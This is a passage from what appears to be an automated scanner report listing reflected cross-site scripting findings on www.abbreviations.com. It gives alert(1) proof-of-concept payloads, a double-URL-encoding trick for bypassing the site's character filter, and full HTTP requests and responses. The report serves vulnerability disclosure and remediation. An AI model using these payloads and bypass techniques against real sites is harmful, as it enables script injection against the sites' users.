The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbreviations3533a%253cscript%253ealert%25281%2529%253c%252fscript%253e02ec5d2c02f/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:35:33 GMT
Connection: close
Content-Length: 27211

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>02ec5d2c02f";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbreviations3533a<script>alert(1)</script>02ec5d2c02f" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "abbreviations3533a<script>
...[SNIP]...

4.422. http://www.abbreviations.com/b1.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7370d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8f2cde6c5 was submitted in the REST URL parameter 1. This input was echoed as 7370d"><script>alert(1)</script>a8f2cde6c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /b1.aspx7370d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8f2cde6c5 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1grciv55jtc043nj02tmceql; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:04:10 GMT
Connection: close
Content-Length: 27095

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does b1.aspx7370d"><script>alert(1)</script>a8f2cde6c5 stand for?, What does b1.aspx7370d">
...[SNIP]...

4.423. http://www.abbreviations.com/b1.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload bbc7d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3af19687e3 was submitted in the REST URL parameter 1. This input was echoed as bbc7d</title><script>alert(1)</script>f3af19687e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /b1.aspxbbc7d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3af19687e3 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oh2g2tf0l1wefs55qtaryc45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:05:54 GMT
Connection: close
Content-Length: 27265

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does b1.aspxbbc7d</title><script>alert(1)</script>f3af19687e3 stand for?</title>
...[SNIP]...

4.424. http://www.abbreviations.com/b1.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51536%253cscript%253ealert%25281%2529%253c%252fscript%253e7a00ceef170 was submitted in the REST URL parameter 1. This input was echoed as 51536<script>alert(1)</script>7a00ceef170 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /b1.aspx51536%253cscript%253ealert%25281%2529%253c%252fscript%253e7a00ceef170 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iab1cy45uqfjxpv3302ggknn; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:05:11 GMT
Connection: close
Content-Length: 27034

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>7a00ceef170";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "b1.aspx51536<script>alert(1)</script>7a00ceef170" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "b1.aspx51536<script>
...[SNIP]...

4.425. http://www.abbreviations.com/b1.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bb6c%2522%253balert%25281%2529%252f%252fd18bcda9b02 was submitted in the REST URL parameter 1. This input was echoed as 9bb6c";alert(1)//d18bcda9b02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /b1.aspx9bb6c%2522%253balert%25281%2529%252f%252fd18bcda9b02 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=t3ixkyvszgc35h2wjylwru45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:04:33 GMT
Connection: close
Content-Length: 26718

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "b1.aspx9bb6c";alert(1)//d18bcda9b02";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "b1.aspx9bb6c";alert(1)//d18bcda9b02" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

4.426. http://www.abbreviations.com/bs.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85bcf%2522%253balert%25281%2529%252f%252f43b53048b7 was submitted in the REST URL parameter 1. This input was echoed as 85bcf";alert(1)//43b53048b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bs.aspx85bcf%2522%253balert%25281%2529%252f%252f43b53048b7 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:25 GMT
Connection: close
Content-Length: 26690

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "bs.aspx85bcf";alert(1)//43b53048b7";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs.aspx85bcf";alert(1)//43b53048b7" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

4.427. http://www.abbreviations.com/bs.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1eeb%253cscript%253ealert%25281%2529%253c%252fscript%253e78129bb9875 was submitted in the REST URL parameter 1. This input was echoed as d1eeb<script>alert(1)</script>78129bb9875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bs.aspxd1eeb%253cscript%253ealert%25281%2529%253c%252fscript%253e78129bb9875 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:00 GMT
Connection: close
Content-Length: 27049

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>78129bb9875";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs.aspxd1eeb<script>alert(1)</script>78129bb9875" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "bs.aspxd1eeb<script>
...[SNIP]...

4.428. http://www.abbreviations.com/bs.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ea5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e305b24ff28e was submitted in the REST URL parameter 1. This input was echoed as 2ea5b"><script>alert(1)</script>305b24ff28e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bs.aspx2ea5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e305b24ff28e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:25:24 GMT
Connection: close
Content-Length: 27088

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does bs.aspx2ea5b"><script>alert(1)</script>305b24ff28e stand for?, What does bs.aspx2ea5b">
...[SNIP]...

4.429. http://www.abbreviations.com/bs.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 8840d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fb241ced95 was submitted in the REST URL parameter 1. This input was echoed as 8840d</title><script>alert(1)</script>9fb241ced95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bs.aspx8840d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fb241ced95 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:29:21 GMT
Connection: close
Content-Length: 27249

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does bs.aspx8840d</title><script>alert(1)</script>9fb241ced95 stand for?</title>
...[SNIP]...

4.430. http://www.abbreviations.com/bs.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as text between TITLE tags. The payload 5fc81</title><script>alert(1)</script>fedac000817 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bs.aspx?st=5fc81</title><script>alert(1)</script>fedac000817 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:18:48 GMT
Connection: close
Content-Length: 27095

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does 5fc81</title><script>alert(1)</script>fedac000817 stand for?</title>
...[SNIP]...

4.431. http://www.abbreviations.com/bs.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 60dff<script>alert(1)</script>065acfc4527 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bs.aspx?st=60dff<script>alert(1)</script>065acfc4527 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:18:09 GMT
Connection: close
Content-Length: 26879

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>065acfc4527";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "60dff<script>alert(1)</script>065acfc4527" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "60dff<script>
...[SNIP]...

4.432. http://www.abbreviations.com/bs.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs.aspx

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb709"%3balert(1)//e93c20de0d6 was submitted in the st parameter. This input was echoed as eb709";alert(1)//e93c20de0d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bs.aspx?st=eb709"%3balert(1)//e93c20de0d6 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:17:38 GMT
Connection: close
Content-Length: 26509

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "eb709";alert(1)//e93c20de0d6";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "eb709";alert(1)//e93c20de0d6" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;

...[SNIP]...

4.433. http://www.abbreviations.com/bs.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs.aspx

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40cdf"><script>alert(1)</script>4bbb37d871e was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bs.aspx?st=40cdf"><script>alert(1)</script>4bbb37d871e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:17:13 GMT
Connection: close
Content-Length: 26899

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does 40cdf"><script>alert(1)</script>4bbb37d871e stand for?, What does 40cdf">
...[SNIP]...

4.434. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2de4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2de11f4e6e was submitted in the REST URL parameter 1. This input was echoed as a2de4"><script>alert(1)</script>f2de11f4e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bs2.aspxa2de4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2de11f4e6e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:27:43 GMT
Connection: close
Content-Length: 27149

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does bs2.aspxa2de4"><script>alert(1)</script>f2de11f4e6e stand for?, What does bs2.aspxa2de4">
...[SNIP]...

4.435. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d35d7%253cscript%253ealert%25281%2529%253c%252fscript%253ef5e8b18658e was submitted in the REST URL parameter 1. This input was echoed as d35d7<script>alert(1)</script>f5e8b18658e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bs2.aspxd35d7%253cscript%253ealert%25281%2529%253c%252fscript%253ef5e8b18658e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:31:36 GMT
Connection: close
Content-Length: 27076

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>f5e8b18658e";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs2.aspxd35d7<script>alert(1)</script>f5e8b18658e" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "bs2.aspxd35d7<script>
...[SNIP]...

4.436. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 20e54%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cef4e545b4 was submitted in the REST URL parameter 1. This input was echoed as 20e54</title><script>alert(1)</script>5cef4e545b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

